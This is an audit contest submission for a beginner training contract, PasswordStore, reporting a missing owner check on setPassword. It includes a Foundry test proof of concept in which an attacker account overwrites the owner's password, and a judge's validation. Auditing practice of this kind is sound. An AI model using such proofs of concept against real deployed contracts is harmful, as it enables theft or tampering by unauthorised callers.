First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

attacker can manipulate password

anjalit

Title

attacker can manipulate password

Bug

no checks applied on the setPassword function to check if the one accessing it is actually the owner or not

POC

  • owner changed the password to "expectedPassword" and later on attacker altered the password with "changedPassword"

  • the "actualPassword" should be equal to the the one set by the owner but cuz attacker manipulated and changed it , now it's equal to "changedPassword" .

function test_attacker_can_manipulate_password() public {
vm.startPrank(owner);
string memory expectedPassword = "myNewPassword";
passwordStore.setPassword(expectedPassword);
vm.startPrank(attacker);
string memory changedPassword = "changedPassword";
passwordStore.setPassword(changedPassword);
vm.startPrank(owner);
string memory actualPassword = passwordStore.getPassword();
//assertEq(actualPassword, expectedPassword);
assertEq(actualPassword, changedPassword);
}

Tools used

Foundry

Fix/Suggestions

there should be some checks same as the getPassword function to check if the owner is the one actually accessing setPassword or not

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-lacking-access-control

Anyone can call `setPassword` and set a new password contrary to the intended purpose.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.